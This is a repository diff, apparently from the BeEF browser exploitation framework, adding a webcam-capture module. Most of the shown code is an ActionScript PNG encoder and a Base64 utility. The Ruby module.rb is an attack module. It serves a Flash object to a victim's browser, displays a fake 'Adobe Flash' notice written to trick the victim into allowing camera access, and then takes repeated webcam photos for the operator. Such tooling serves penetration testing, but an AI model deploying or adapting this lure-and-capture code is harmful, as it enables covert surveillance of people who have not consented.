writeChunk(png,0x49444154,IDAT);
// Build IEND chunk
writeChunk(png,0x49454E44,null);
// return PNG
return png;
}
private static var crcTable:Array;
private static var crcTableComputed:Boolean = false;
private static function writeChunk(png:ByteArray,
type:uint, data:ByteArray):void {
if (!crcTableComputed) {
crcTableComputed = true;
crcTable = [];
var c:uint;
for (var n:uint = 0; n < 256; n++) {
c = n;
for (var k:uint = 0; k < 8; k++) {
if (c & 1) {
c = uint(uint(0xedb88320) ^
uint(c >>> 1));
} else {
c = uint(c >>> 1);
}
}
crcTable[n] = c;
}
}
var len:uint = 0;
if (data != null) {
len = data.length;
}
png.writeUnsignedInt(len);
var p:uint = png.position;
png.writeUnsignedInt(type);
if ( data != null ) {
png.writeBytes(data);
}
var e:uint = png.position;
png.position = p;
c = 0xffffffff;
for (var i:int = 0; i < (e-p); i++) {
c = uint(crcTable[
(c ^ png.readUnsignedByte()) &
uint(0xff)] ^ uint(c >>> 8));
}
c = uint(c^uint(0xffffffff));
png.position = e;
png.writeUnsignedInt(c);
}
}
}

106
modules/browser/webcam/dev/com/foxarc/util/Base64.as Normal file
View File

@@ -0,0 +1,106 @@
package com.foxarc.util{
import flash.utils.ByteArray;
public class Base64 {
private static const encodeChars:Array =
['A','B','C','D','E','F','G','H',
'I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X',
'Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3',
'4','5','6','7','8','9','+','/'];
private static const decodeChars:Array =
[-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59,
60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6,
7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22,
23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, -1, -1, -1, -1, -1];
public static function encode(data:ByteArray):String {
var out:Array = [];
var i:int = 0;
var j:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:int;
while (i < len) {
c = data[i++] << 16 | data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f];
}
if (r == 1) {
c = data[i++];
out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "==";
}
else if (r == 2) {
c = data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "=";
}
return out.join('');
}
public static function decode(str:String):ByteArray {
var c1:int;
var c2:int;
var c3:int;
var c4:int;
var i:int;
var len:int;
var out:ByteArray;
len = str.length;
i = 0;
out = new ByteArray();
while (i < len) {
// c1
do {
c1 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1) {
break;
}
// c2
do {
c2 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1) {
break;
}
out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4));
// c3
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61) {
return out;
}
c3 = decodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1) {
break;
}
out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
// c4
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61) {
return out;
}
c4 = decodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1) {
break;
}
out.writeByte(((c3 & 0x03) << 6) | c4);
}
return out;
}
}
}

BIN
modules/browser/webcam/dev/takeit.fla Normal file
View File

Binary file not shown.

63
modules/browser/webcam/module.rb Normal file
View File

@@ -0,0 +1,63 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'base64'
class Webcam < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
end
def self.options
configuration = BeEF::Core::Configuration.instance
social_engineering_title = "This website is using Adobe Flashd"
social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
no_of_pictures = 20
interval = 1000
return [
{'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea' }, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px' }, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures in ms',
'value' => interval,
'width' => '100px' }
]
end
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

4
modules/browser/webcam/swfobject.js Executable file
View File

File diff suppressed because one or more lines are too long

BIN
modules/browser/webcam/takeit.swf Normal file
View File

Binary file not shown.